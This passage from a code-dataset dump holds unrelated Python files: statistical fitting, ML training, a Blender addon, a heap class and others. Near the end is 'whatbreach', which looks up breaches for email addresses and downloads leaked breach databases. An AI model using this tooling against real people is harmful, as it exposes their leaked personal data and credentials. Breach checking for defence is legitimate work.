every time step), \n # one could just sum over a small subset to increase computation speed?\n #print((-r/(2*dt)-np.log(np.sqrt(4*np.pi*dt)**Dim*np.sqrt(d2_det))).shape)\n #log_like = (-r/(2*dt)-np.log(np.sqrt(4*np.pi*dt)**Dim*np.sqrt(d2_det))).sum()\n log_like = (-r/(2*dt)-np.log(np.sqrt(4*np.pi*dt)**Dim*np.sqrt(d2_det)))\n log_like = log_like.sum()\n return log_like\n else:\n return -np.inf\n\n\ndef neg_log_likelihood(alpha,x,dt): #L Threshold Lambdac\n return -1*log_likelihood(alpha,x,dt)\n\n\n# Log_Likelihood for after some parameters were cut off by the Threshold\n\ndef second_neg_log_likelihood(Coeff, Index,x,dt):\n # Index: Index of those coefficients which are set to 0: Boolean \n Index[0:nDiff] = False # noise NEVER cut off\n Coeff[Index] = 0\n return -1*log_likelihood(Coeff,x,dt)\n\n\n\n# BIC as goodness criterion for a threshold value\n\ndef BIC(alpha,x,dt,L): # mit Lambda Threshold\n \n logi = np.abs(alpha)>L # which are larger than Lambda?\n logi[0] = True # noise is always included\n return np.log(x[:,0].size)*np.sum( logi ) - 2*log_likelihood(alpha, x,dt )\n\n\n# Calculate BIC in the Loop with thresholding\n\ndef Loop(x, dt, L, a_Ini):\n # estimates alpha parameters based on starting values a_Ini for a given threshold L\n a_hat = optimize.minimize(neg_log_likelihood, a_Ini,args=(x,dt)) # max likelihood\n \n for i in np.arange(0,n_Cut):\n Cut = (np.abs(a_hat[\"x\"])=3.0\",\n) \n","repo_name":"darkdarcool/GitData","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"6469611082","text":"# filename: export_tree.py\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\r\n\r\n\r\n\r\ndef export():\r\n # train data\r\n train_data = pd.read_csv('traindata/clean_train_data_5.csv')\r\n X = train_data.iloc[:,1:66]\r\n y = train_data['label']\r\n \r\n feature_names = X.columns.values\r\n # decition tree\r\n dc = DecisionTreeClassifier(max_depth=5, criterion='entropy', max_features=7, random_state=1)\r\n dc.fit(X, y)\r\n \r\n export_graphviz(dc, out_file='tree.dot', feature_names=feature_names)\r\n\r\nif __name__ == '__main__':\r\n \r\n export()\r\n \r\n","repo_name":"linfang010/alitianchi","sub_path":"o2o/src/export_tree.py","file_name":"export_tree.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"35215706969","text":"import requests\n\nid = {\"id\": \"57\"}\nr = requests.get(\"http://pulse-rest-testing.herokuapp.com/roles/\", id)\nprint(r.text)\npayload = {\"name\": \"Dima\", \"type\": \"home\", \"level\": \"80\", \"book\": \"13\"}\n#r = requests.post(\"http://pulse-rest-testing.herokuapp.com/roles/\", payload)\n#print(r)\nr = r.json()\nlast = dict(r[-1])\n#id = last.items()\nid = last.get(\"id\")\nif \"Dima\" in last.get(\"name\") and \"home\" in last.get(\"type\"):\n print(\"sdfdsfsdafas\")\nprint(id)\nprint(dict.items(last))","repo_name":"v1doq/git_repo","sub_path":"Lesson 5th/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33308082710","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls.defaults import *\nfrom panov.views import PersonEditView, RequestListView\n\n\nurlpatterns = patterns('panov.views',\n\n url(r'^$', 'index', name=\"index\"),\n url(r'^request/list/$', RequestListView.as_view(), name=\"request-list\"),\n url(r'^person/edit/(?P\\d+)/$',\n PersonEditView.as_view(),\n name=\"person-edit\"),\n url(r'^person/edit/$',\n PersonEditView.as_view(),\n name=\"person-edit-ajax\"),\n url(r'accounts/login/$', 'login', name='login'),\n url(r'accounts/logout/$', 'logout', name='logout'),\n url(r'^history/$', 'history', name=\"history\"),\n url(r'^person/edit/(?P\\d+)/upload/$',\n 'upload',\n name=\"person-upload\"),\n )\n","repo_name":"vice-versa/42cc","sub_path":"panov/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"34618451737","text":"import os.path as osp\n\nfrom .builder import DATASETS\nfrom .custom import CustomDataset\n\n\n@DATASETS.register_module()\nclass A2D2Dataset34Classes(CustomDataset):\n \"\"\"The A2D2 dataset with the original semantic segmentation classes.\n\n The dataset features 41,280 frames with semantic segmentation having 34\n classes. The original set of 38 classes are reduced to 34 for reasons\n explained bellow.\n\n The segmentation conversion is defined in the following file:\n tools/convert_datasets/a2d2.py\n\n Instance segmentations and some segmentation classes are collapsed to\n follow the categorical 'trainids' label format.\n Ex: 'Car 1' and 'Car 2' --> 'Car'\n\n The color palette follows the coloring in 'class_list.json'.\n\n The following segmentation classes are ignored (i.e. trainIds 255):\n - Ego car: A calibrated system should a priori know what input\n region corresponds to the ego vehicle.\n - Blurred area: Ambiguous semantic.\n - Rain dirt: Ambiguous semantic.\n\n The following segmentation class is merged due to rarity:\n - Speed bumper --> RD normal street (randomly parsing 50% of dataset\n results in only one sample containing the 'speed_bumper' semantic)\n\n The ``img_suffix`` is fixed to '.png' and ``seg_map_suffix`` is\n fixed to '_34LabelTrainIds.png' for the 34 class A2D2 dataset.\n\n Ref: https://www.a2d2.audi/a2d2/en/dataset.html\n \"\"\"\n\n CLASSES = ('rd_normal_street', 'non-drivable_street', 'rd_restricted_area',\n 'drivable_cobblestone', 'slow_drive_area', 'parking_area',\n 'solid_line', 'dashed_line', 'zebra_crossing', 'grid_structure',\n 'traffic_guide_obj', 'painted_drive_instr', 'sidewalk',\n 'curbstone', 'buildings', 'sidebars', 'road_blocks', 'poles',\n 'traffic_signal', 'traffic_sign', 'signal_corpus',\n 'irrelevant_signs', 'electronic_traffic', 'nature_object',\n 'sky', 'pedestrian', 'bicycle', 'car', 'utility_vehicle',\n 'truck', 'tractor', 'small_vehicles', 'animals',\n 'obstacles_trash')\n\n PALETTE = [[255, 0, 255], [139, 99, 108], [150, 0, 150], [180, 50, 180],\n [238, 233, 191], [150, 150, 200], [255, 193, 37], [128, 0, 255],\n [210, 50, 115], [238, 162, 173], [159, 121,\n 238], [200, 125, 210],\n [180, 150, 200], [128, 128, 0], [241, 230, 255], [233, 100, 0],\n [185, 122, 87], [255, 246, 143], [0, 128, 255], [30, 220, 220],\n [33, 44, 177], [64, 0, 64], [255, 70, 185], [147, 253, 194],\n [135, 206, 255], [204, 153, 255], [182, 89, 6], [255, 0, 0],\n [255, 255, 0], [255, 128, 0], [0, 0, 100], [0, 255, 0],\n [204, 255, 153], [255, 0, 128]]\n\n def __init__(self, **kwargs):\n super(A2D2Dataset34Classes, self).__init__(\n img_suffix='.png', seg_map_suffix='_34LabelTrainIds.png', **kwargs)\n assert osp.exists(self.img_dir) is not None\n","repo_name":"ViCE-model/ViCE-model","sub_path":"mmsegmentation/mmseg/datasets/a2d2_34cls.py","file_name":"a2d2_34cls.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18777165552","text":"###############################################################################################################################\r\n'''\r\n __ __ _ ___ _ _\r\n \\ \\ / / ___ _ _ | |_ ___ __ __ | _ \\ __ _ _ _ __| | ___ _ __ (_) ___ ___ _ _\r\n \\ / / -_)| '_|| _|/ -_)\\ \\ / | // _` || ' \\ / _` |/ _ \\| ' \\ | ||_ // -_)| '_|\r\n \\_/ \\___||_| \\__|\\___|/_\\_\\ |_|_\\\\__/_||_||_|\\__/_|\\___/|_|_|_||_|/__|\\___||_|\r\n\r\n '''\r\n###############################################################################################################################\r\n\r\nbl_info = {\r\n \"name\": \"Vertex Randomizer\",\r\n \"author\": \"DS89\",\r\n \"version\": (1, 0),\r\n \"blender\": (2, 80, 0),\r\n \"location\": \"Properties > Object > Vertex Randomizer\",\r\n \"description\": \"Changes location of vertices at random\",\r\n \"warning\": \"Add a shape key in order to enable the addon\",\r\n \"doc_url\": \"\",\r\n \"category\": \"Add Mesh\",\r\n}\r\n\r\nimport bpy\r\nimport random\r\n\r\n\r\n# Add a shape key to an object if one does not exist\r\ndef AddShapeKey(self, context):\r\n object = bpy.context.active_object\r\n if object.active_shape_key_index == 0:\r\n bpy.ops.object.shape_key_add(from_mix = False)\r\n bpy.ops.object.shape_key_add(from_mix = False)\r\n\r\n# Addon panel\r\nclass VertexRandomizer(bpy.types.Panel):\r\n bl_label = \"Vertex Randomizer\"\r\n bl_idname = \"SCENE_PT_layout\"\r\n bl_space_type = 'PROPERTIES'\r\n bl_region_type = 'WINDOW'\r\n bl_context = \"data\"\r\n\r\n# Creates the panel for the user interface\r\n def draw(self, context):\r\n layout = self.layout\r\n scene = context.scene\r\n vrtool = scene.vr_tool\r\n\r\n # Panel object indicator\r\n object = bpy.context.active_object\r\n\r\n # Shape key data (Controls the intensity of shape key)\r\n shape = object.data.shape_keys\r\n current = object.active_shape_key_index\r\n\r\n # Scene data (Inputs the location of scene from panel)\r\n scene = context.scene\r\n vrtool = scene.vr_tool\r\n min = vrtool.min_shape\r\n max = vrtool.max_shape\r\n min_key = vrtool.min_key\r\n max_key = vrtool.max_key\r\n key_value = bpy.data.shape_keys[\"Key\"].key_blocks[current].value\r\n str_val = round(key_value, 3)\r\n\r\n # Layout data\r\n layout.label(text = \"Selected object: \"+object.name)\r\n row = layout.row()\r\n row.operator('vr.addshape')\r\n layout.label(text = \"Key intensity range\")\r\n row = layout.row()\r\n row.prop(vrtool, 'min_key')\r\n row.prop(vrtool, 'max_key')\r\n row = layout.row()\r\n layout.label(text = \"Shape distortion amount\")\r\n row = layout.row()\r\n row.prop(vrtool, 'min_shape')\r\n row.prop(vrtool, 'max_shape')\r\n row = layout.row()\r\n layout.label(text = \"Current key value: \"+str(str_val))\r\n row = layout.row()\r\n row.operator('vr.distortshape')\r\n\r\n\r\n# Add a shape key if there are none availible\r\n\r\nclass AddShapeOp(bpy.types.Operator):\r\n \"\"\"Add shape key to object if none are present\"\"\"\r\n bl_label = 'Add shape key'\r\n bl_idname = 'vr.addshape'\r\n\r\n def execute(self,context):\r\n object = bpy.context.active_object\r\n AddShapeKey(self, context)\r\n return {'FINISHED'}\r\n\r\n# User defined input\r\n\r\nclass VertexValue(bpy.types.PropertyGroup):\r\n min_shape:bpy.props.FloatProperty(\r\n name = \"Min:\",\r\n description = \"Set minimum vertex position float value\",\r\n soft_max = 1,\r\n soft_min = -1\r\n )\r\n max_shape:bpy.props.FloatProperty(\r\n name = \"Max:\",\r\n description = \"Set maximum vertex position float value\",\r\n soft_max = 
1,\r\n        soft_min = -1\r\n    )\r\n    min_key:bpy.props.FloatProperty(\r\n        name = \"Min:\",\r\n        description = \"Set minimum shape key float value\",\r\n        soft_max = 1,\r\n        soft_min = 0\r\n    )\r\n    max_key:bpy.props.FloatProperty(\r\n        name = \"Max:\",\r\n        description = \"Set maximum shape key float value\",\r\n        soft_max = 1,\r\n        soft_min = 0\r\n    )\r\n\r\n\r\nclass RandomDistortion(bpy.types.Operator):\r\n    \"\"\"Randomize the vertices\"\"\"\r\n    bl_label = \"Distort shape key\"\r\n    bl_idname = 'vr.distortshape'\r\n    bl_options = {'REGISTER', 'UNDO'}\r\n\r\n    def execute(self, context):\r\n        # Active object data (Determines objects in scene)\r\n        selected = bpy.context.selectable_objects\r\n        object = bpy.context.active_object\r\n        verts = object.data.vertices\r\n        active = selected and object\r\n\r\n        # Shape key data (Controls the intensity of shape key)\r\n        shape=object.data.shape_keys\r\n        current=object.active_shape_key_index\r\n\r\n        # Scene data (Inputs the location of scene from panel)\r\n        scene = context.scene\r\n        vrtool = scene.vr_tool\r\n\r\n        # Distort code\r\n        if vrtool.min_shape != 0 or vrtool.max_shape != 0:\r\n            min = vrtool.min_shape\r\n            max = vrtool.max_shape\r\n            min_key = vrtool.min_key\r\n            max_key = vrtool.max_key\r\n            keyFlo = random.uniform(min_key, max_key)\r\n            randInt = random.randrange(1000)\r\n            bpy.data.shape_keys[\"Key\"].key_blocks[current].value = keyFlo\r\n            randFlo = random.uniform(min,max)\r\n            bpy.ops.object.editmode_toggle()\r\n            bpy.ops.mesh.select_random(seed=randInt)\r\n            bpy.ops.transform.vertex_random(offset = randFlo, seed = randInt)\r\n            bpy.ops.object.editmode_toggle()\r\n        else:\r\n            self.report({'ERROR'}, \"Min and max values must be greater than or less than zero\")\r\n        return {'FINISHED'}\r\n\r\nclasses = [VertexValue, VertexRandomizer, AddShapeOp, RandomDistortion]\r\n\r\ndef register():\r\n    for cls in classes:\r\n        bpy.utils.register_class(cls)\r\n    bpy.types.Scene.vr_tool = bpy.props.PointerProperty(type = VertexValue)\r\n\r\n\r\ndef unregister():\r\n    for cls in classes:\r\n        bpy.utils.unregister_class(cls)\r\n    del bpy.types.Scene.vr_tool\r\n\r\nif __name__ == \"__main__\":\r\n    register()\r\n","repo_name":"dsa89/Vertex-Randomizer","sub_path":"Vertex Randomizer.py","file_name":"Vertex Randomizer.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"36392982867","text":"import argparse\nimport tensorflow as tf\nimport os\nimport sys\nimport time\nimport yaml\nfrom tqdm import tqdm\n\nfrom tensorflow.keras.optimizers.schedules import PiecewiseConstantDecay\nfrom dataset import create_batch_generator\nfrom anchor import generate_default_boxes\nfrom network import create_ssd\nfrom losses import create_losses\n\n@tf.function\ndef train_step(imgs, gt_confs, gt_locs, ssd, criterion, optimizer):\n with tf.GradientTape() as tape:\n confs, locs = ssd(imgs)\n\n conf_loss, loc_loss = criterion(\n confs, locs, gt_confs, gt_locs)\n\n loss = conf_loss + loc_loss\n l2_loss = [tf.nn.l2_loss(t) for t in ssd.trainable_variables]\n l2_loss = args.weight_decay * tf.math.reduce_sum(l2_loss)\n loss += l2_loss\n\n gradients = tape.gradient(loss, ssd.trainable_variables)\n optimizer.apply_gradients(zip(gradients, ssd.trainable_variables))\n\n return loss, conf_loss, loc_loss, l2_loss\n\n\nif __name__ == '__main__':\n gpus = tf.config.experimental.list_physical_devices('GPU')\n \n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--anno-path', default='dataset/server_room/train_digit.txt')\n parser.add_argument('--data-year', default='2007')\n parser.add_argument('--arch', default='ssd300')\n parser.add_argument('--batch-size', default=64, type=int)\n parser.add_argument('--num-batches', default=-1, type=int)\n parser.add_argument('--neg-ratio', default=3, type=int)\n parser.add_argument('--initial-lr', default=1e-3, type=float)\n parser.add_argument('--momentum', default=0.9, type=float)\n parser.add_argument('--weight-decay', default=5e-4, type=float)\n parser.add_argument('--num-epochs', default=100, type=int)\n parser.add_argument('--checkpoint-dir', default='./check_points/ssd')\n parser.add_argument('--checkpoint-path', default=None) # latest 'check_points/ssd/ssd_epoch_latest.h5'\n parser.add_argument('--pretrained-type', default='base')\n parser.add_argument('--gpu-id', default='0')\n\n args = parser.parse_args()\n\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n\n os.makedirs(args.checkpoint_dir, exist_ok=True)\n \n \n labels = ['0','1','2','3','4','5','6','7','8','9', '.']\n \n NUM_CLASSES = len(labels) + 1\n\n with open('model/tensorflow/ssd/config.yml') as f:\n cfg = yaml.load(f, Loader=yaml.Loader)\n\n try:\n config = cfg[args.arch.upper()]\n except AttributeError:\n raise ValueError('Unknown architecture: {}'.format(args.arch))\n\n default_boxes = generate_default_boxes(config)\n\n batch_generator, info = create_batch_generator(\n args.anno_path, default_boxes,\n config['image_size'],\n args.batch_size, args.num_batches,\n mode='train', augmentation = False,labels = labels) # the patching algorithm is currently causing bottleneck sometimes , augmentation=['flip']\n \n try:\n ssd = create_ssd(NUM_CLASSES, args.arch,\n args.pretrained_type,\n checkpoint_dir=args.checkpoint_path, checkpoint_path=args.checkpoint_path)\n except Exception as e:\n print(e)\n print('The program is exiting...')\n sys.exit()\n\n criterion = create_losses(args.neg_ratio, NUM_CLASSES)\n\n steps_per_epoch = info['length'] // args.batch_size\n\n lr_fn = PiecewiseConstantDecay(\n boundaries=[int(steps_per_epoch * args.num_epochs * 2 / 3),\n int(steps_per_epoch * args.num_epochs * 5 / 6)],\n values=[args.initial_lr, args.initial_lr * 0.1, args.initial_lr * 0.01])\n \n optimizer = tf.keras.optimizers.Adam(learning_rate=lr_fn)\n\n train_log_dir = './check_points/ssd/logs/train'\n 
train_summary_writer = tf.summary.create_file_writer(train_log_dir)\n\n for epoch in range(args.num_epochs):\n avg_loss = 0.0\n avg_conf_loss = 0.0\n avg_loc_loss = 0.0\n start = time.time()\n i = 0\n progress = tqdm(batch_generator)\n for _, imgs, gt_confs, gt_locs in progress:\n loss, conf_loss, loc_loss, l2_loss = train_step(imgs, gt_confs, gt_locs, ssd, criterion, optimizer)\n \n avg_loss = (avg_loss * i + loss.numpy()) / (i + 1)\n avg_conf_loss = (avg_conf_loss * i + conf_loss.numpy()) / (i + 1)\n avg_loc_loss = (avg_loc_loss * i + loc_loss.numpy()) / (i + 1)\n \n progress.set_description('Epoch: {} Batch {} Time: {:.2}s | Loss: {:.4f} Conf: {:.4f} Loc: {:.4f}'.format(\n epoch + 1, i + 1, time.time() - start, avg_loss, avg_conf_loss, avg_loc_loss))\n \n i = i + 1\n \n # avg_val_loss = 0.0\n # avg_val_conf_loss = 0.0\n # avg_val_loc_loss = 0.0\n # for i, (_, imgs, gt_confs, gt_locs) in enumerate(val_generator):\n # val_confs, val_locs = ssd(imgs)\n # val_conf_loss, val_loc_loss = criterion(val_confs, val_locs, gt_confs, gt_locs)\n # val_loss = val_conf_loss + val_loc_loss\n # avg_val_loss = (avg_val_loss * i + val_loss.numpy()) / (i + 1)\n # avg_val_conf_loss = (avg_val_conf_loss * i + val_conf_loss.numpy()) / (i + 1)\n # avg_val_loc_loss = (avg_val_loc_loss * i + val_loc_loss.numpy()) / (i + 1)\n\n with train_summary_writer.as_default():\n tf.summary.scalar('loss', avg_loss, step=epoch)\n tf.summary.scalar('conf_loss', avg_conf_loss, step=epoch)\n tf.summary.scalar('loc_loss', avg_loc_loss, step=epoch)\n\n if (epoch + 1) % 10 == 0:\n ssd.save_weights(os.path.join(args.checkpoint_dir, 'ssd_epoch_{}.h5'.format(epoch + 1)))\n \n if (epoch + 1) % 10 == 0:\n ssd.save_weights(os.path.join(args.checkpoint_dir, 'ssd_epoch_latest.h5'))\n","repo_name":"dataignitelab/iot_ai_model","sub_path":"model/tensorflow/ssd/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"91"}
+{"seq_id":"402628124","text":"import tkinter #requires specify that imported methods comes from this pack\r\n#from tkinter import *\r\nmaster = tkinter.Tk()\r\n\r\ncanvas_width = 80\r\ncanvas_height = 40\r\nw = tkinter.Canvas(master, \r\n width=canvas_width,\r\n height=canvas_height)\r\nw.pack()\r\n\r\ny = int(canvas_height / 2)\r\nw.create_line(0, y, canvas_width, y, fill=\"#476042\", width=2)\r\n#variables in \"create_line\" are: (x_start, y_start, x_end, y_end, color, width)\r\n\r\nmaster.mainloop()","repo_name":"M4RC7/my-portfolio","sub_path":"Python/tk_linespec.py","file_name":"tk_linespec.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38713750776","text":"\nimport re\n\n\nimport pytc\nhdb = pytc.HDB()\nhdb.open( 'intcorpus.tch', pytc.BDBOWRITER | pytc.BDBOREADER | pytc.BDBOCREAT)\n\nimport pymongo\nC = pymongo.Connection( 'localhost').corpusdb\n\ndef main():\n\tnumbers = re.compile( r'\\d')\n\tkeys = open('keys').xreadlines()\n\tfor key in keys:\n\t\tif not numbers.search( key):\n\t\t\tcount = hdb.addint( key[:-1], 0)\n\t\t\tC.df.insert( {'term':key[:-1], 'count':count})\n\nif __name__ == '__main__': main()\n","repo_name":"japherwocky/wikiparser","sub_path":"tcexport.py","file_name":"tcexport.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"27456399447","text":"class MinHeap:\n # MinHeap tracks the minimum element as the element at \n # index 1 within an internal Python list.\n # When adding elements, we use .heapify_up() to compare the \n # new element with its parent, making swaps if it violates the\n # heap property: children must be greater than their parents.\n # When removing the minimum element, we swap it with the last \n # element in the list. Then we use .heapify_down() to compare\n # the new root with its children, swapping with the smaller \n # child if necessary.\n def __init__(self):\n # Creates a list and count variable\n self.heap_list = [None]\n self.count = 0\n\n # HEAP HELPER METHODS\n # DO NOT CHANGE!\n # “child” and “parent” elements are determined by their relative indices \n # within the internal list. By doing some arithmetic on an element’s index, \n # we can determine the indices for parent and child elements (if they exist).\n def parent_idx(self, idx):\n # heap.parent_idx(4)\n # (4 // 2) == 2\n # Element at index 4 is 61 \n # Element at index 2 is 13\n # The parent element of 61 is 13\n return idx // 2\n\n def left_child_idx(self, idx):\n # heap.left_child(3)\n # (3 * 2) == 6\n # Element at index 3 is 21\n # Element at index 6 is 23\n # The left child element of 21 is 23\n return idx * 2\n\n def right_child_idx(self, idx):\n return idx * 2 + 1\n\n def child_present(self, idx):\n return self.left_child_idx(idx) <= self.count\n\n # END OF HEAP HELPER METHODS\n \n # Some key methods to be included in the MinHeap class\n \n # Replaces root with last child, calls .heapify-down()\n def retrieve_min(self):\n if self.count == 0:\n print(\"No items in heap\")\n return None\n \n min = self.heap_list[1]\n print(\"Removing: {0} from {1}\".format(min, self.heap_list))\n self.heap_list[1] = self.heap_list[self.count]\n self.count -= 1 # swap\n self.heap_list.pop() # swap\n print(\"Last element moved to first: {0}\".format(self.heap_list)) \n self.heapify_down()\n return min\n \n \n # Adds new element to heap_list, calls heapify_up() \n def add(self, element):\n self.count += 1\n print(\"Adding: {0} to {1}\".format(element, self.heap_list))\n self.heap_list.append(element)\n self.heapify_up()\n \n \n # Returns the child a parent should swap with\n def get_smaller_child_idx(self, idx):\n if self.right_child_idx(idx) > self.count:\n print(\"There is only a left child\")\n return self.left_child_idx(idx)\n else:\n left_child = self.heap_list[self.left_child_idx(idx)]\n right_child = self.heap_list[self.right_child_idx(idx)]\n if left_child < right_child:\n print(\"Left child is smaller\")\n return self.left_child_idx(idx)\n else:\n print(\"Right child is smaller\")\n return self.right_child_idx(idx)\n \n \n # Implements heapify up\n def heapify_up(self): \n idx = self.count\n while self.parent_idx(idx) > 0:\n if self.heap_list[self.parent_idx(idx)] > self.heap_list[idx]:\n tmp = self.heap_list[self.parent_idx(idx)]\n print(\"swapping {0} with {1}\".format(tmp, self.heap_list[idx]))\n self.heap_list[self.parent_idx(idx)] = self.heap_list[idx]\n self.heap_list[idx] = tmp\n \n idx = self.parent_idx(idx)\n \n print(\"HEAP RESTORED! 
{0}\".format(self.heap_list))\n print(\"\")\n\n # def heapify_up(self):\n # print(\"Heapifying up\")\n # idx = self.count\n # while self.parent_idx(idx) > 0:\n # child = self.heap_list[idx]\n # parent = self.heap_list[self.parent_idx(idx)]\n # if parent > child:\n # print(\"swapping {0} with {1}\".format(parent, child))\n # self.heap_list[idx] = parent\n # self.heap_list[self.parent_idx(idx)] = child\n # idx = self.parent_idx(idx)\n # print(\"Heap Restored {0}\".format(self.heap_list))\n \n # Implements heapify down\n def heapify_down(self):\n idx = 1\n while self.child_present(idx):\n smaller_child_idx = self.get_smaller_child_idx(idx)\n if self.heap_list[idx] > self.heap_list[smaller_child_idx]:\n tmp = self.heap_list[smaller_child_idx]\n print(\"swapping {0} with {1}\".format(self.heap_list[idx], tmp))\n self.heap_list[smaller_child_idx] = self.heap_list[idx]\n self.heap_list[idx] = tmp\n\n idx = smaller_child_idx\n print(\"HEAP RESTORED! {0}\".format(self.heap_list))\n print(\"\") \n\n \n \n \n # count swaps \n# class MinHeap:\n# def __init__(self):\n# self.heap_list = [None]\n# self.count = 0\n\n# def parent_idx(self, idx):\n# return idx // 2\n\n# def left_child_idx(self, idx):\n# return idx * 2\n\n# def right_child_idx(self, idx):\n# return idx * 2 + 1\n\n# def child_present(self, idx):\n# return self.left_child_idx(idx) <= self.count\n \n# def retrieve_min(self):\n# if self.count == 0:\n# print(\"No items in heap\")\n# return None\n \n# min = self.heap_list[1]\n# self.heap_list[1] = self.heap_list[self.count]\n# self.count -= 1\n# self.heap_list.pop()\n# self.heapify_down()\n# return min\n\n# def add(self, element):\n# self.count += 1\n# self.heap_list.append(element)\n# self.heapify_up()\n\n\n# def get_smaller_child_idx(self, idx):\n# if self.right_child_idx(idx) > self.count:\n# return self.left_child_idx(idx)\n# else:\n# left_child = self.heap_list[self.left_child_idx(idx)]\n# right_child = self.heap_list[self.right_child_idx(idx)]\n# if left_child < right_child:\n# return self.left_child_idx(idx)\n# else:\n# return self.right_child_idx(idx)\n \n# def heapify_up(self):\n# idx = self.count\n# swap_count = 0\n# while self.parent_idx(idx) > 0:\n# if self.heap_list[self.parent_idx(idx)] > self.heap_list[idx]:\n# swap_count += 1\n# tmp = self.heap_list[self.parent_idx(idx)]\n# self.heap_list[self.parent_idx(idx)] = self.heap_list[idx]\n# self.heap_list[idx] = tmp\n# idx = self.parent_idx(idx)\n\n# element_count = len(self.heap_list)\n# if element_count > 10000:\n# print(\"Heap of {0} elements restored with {1} swaps\"\n# .format(element_count, swap_count))\n# print(\"\") \n \n# def heapify_down(self):\n# idx = 1\n# # starts at 1 because we swapped first and last elements\n# swap_count = 1\n# while self.child_present(idx):\n# smaller_child_idx = self.get_smaller_child_idx(idx)\n# if self.heap_list[idx] > self.heap_list[smaller_child_idx]:\n# swap_count += 1\n# tmp = self.heap_list[smaller_child_idx]\n# self.heap_list[smaller_child_idx] = self.heap_list[idx]\n# self.heap_list[idx] = tmp\n# idx = smaller_child_idx\n\n# element_count = len(self.heap_list)\n# if element_count >= 10000:\n# print(\"Heap of {0} elements restored with {1} swaps\"\n# .format(element_count, swap_count))\n# print(\"\") \n","repo_name":"israelias/data-structures","sub_path":"heap/minheap.py","file_name":"minheap.py","file_ext":"py","file_size_in_byte":7424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"20791009680","text":"import json\nimport subprocess\n\nfrom lib.cmd import Parser\nfrom hookers.hunter_io_hook import HunterIoHook\nfrom hookers.hibp_hook import BeenPwnedHook\nfrom hookers.dehashed_hook import DehashedHook\nfrom hookers.databasestoday_hook import DatabasesTodayHook\nfrom lib.settings import (\n BANNER,\n display_found_databases,\n grab_api_tokens,\n check_ten_minute_email,\n TEN_MINUTE_EMAIL_EXTENSION_LIST\n)\nfrom lib.formatter import (\n info,\n error,\n warn,\n prompt\n)\n\n\ndef main():\n try:\n opt = Parser().optparse()\n print(BANNER)\n res = Parser().check_opts(opt)\n if res is not None:\n to_search = res\n else:\n to_search = []\n do_not_search = []\n\n if len(to_search) == 0:\n if opt.singleEmail is None and opt.emailFile is None:\n warn(\"you have not provided an email to scan, redirecting to the help menu\")\n subprocess.call([\"python\", \"whatbreach.py\", \"--help\"])\n exit(1)\n if opt.searchHunterIo and opt.singleEmail is not None:\n info(\"starting search on hunter.io using {}\".format(opt.singleEmail))\n api_tokens = grab_api_tokens()\n file_results = HunterIoHook(\n opt.singleEmail, api_tokens[\"hunter.io\"], verify_emails=opt.verifyEmailsThroughHunterIo\n ).hooker()\n with open(file_results) as data:\n emails = json.loads(data.read())[\"discovered_emails\"]\n for email in emails:\n to_search.append(email)\n elif opt.singleEmail is not None:\n info(\"starting search on single email address: {}\".format(opt.singleEmail))\n to_search = [opt.singleEmail]\n elif opt.emailFile is not None:\n try:\n open(opt.emailFile).close()\n except IOError:\n error(\"unable to open file, does it exist?\")\n exit(1)\n with open(opt.emailFile) as emails:\n info(\"parsing email file: {}\".format(opt.emailFile))\n to_search = emails.readlines()\n info(\"starting search on a total of {} email(s)\".format(len(to_search)))\n\n for email in to_search:\n email = email.strip()\n\n if opt.checkTenMinuteEmail:\n if check_ten_minute_email(email, TEN_MINUTE_EMAIL_EXTENSION_LIST):\n warn(\"email: {} appears to be a ten minute email\".format(email))\n answer = prompt(\"would you like to process the email[y/N]\")\n if answer.startswith(\"n\"):\n do_not_search.append(email)\n\n if email not in do_not_search:\n info(\"searching breached accounts on HIBP related to: {}\".format(email))\n account_dumps = BeenPwnedHook(email).account_hooker()\n info(\"searching for paste dumps on HIBP related to: {}\".format(email))\n\n if opt.searchPastebin:\n paste_dumps = BeenPwnedHook(email).paste_hooker()\n else:\n warn(\"suppressing discovered pastes\")\n paste_dumps = []\n\n if account_dumps is not None and paste_dumps is not None:\n info(\n \"found a total of {} database breach(es) and a total of {} paste(s) pertaining to: {}\".format(\n len(account_dumps), len(paste_dumps), email\n )\n )\n if opt.searchDehashed:\n found_databases = DehashedHook(account_dumps).hooker()\n else:\n warn(\"suppressing discovered databases\")\n found_databases = {}\n for i, dump in enumerate(paste_dumps, start=1):\n found_databases[\"Paste#{}\".format(i)] = str(dump)\n display_found_databases(found_databases)\n if opt.downloadDatabase:\n for item in found_databases.keys():\n if \"Paste\" not in item:\n info(\"searching for downloadable databases using query: {}\".format(item.lower()))\n downloaded = DatabasesTodayHook(\n str(item), downloads_directory=opt.saveDirectory\n ).hooker()\n if len(downloaded) != 0:\n info(\n \"downloaded a total of {} database(s) 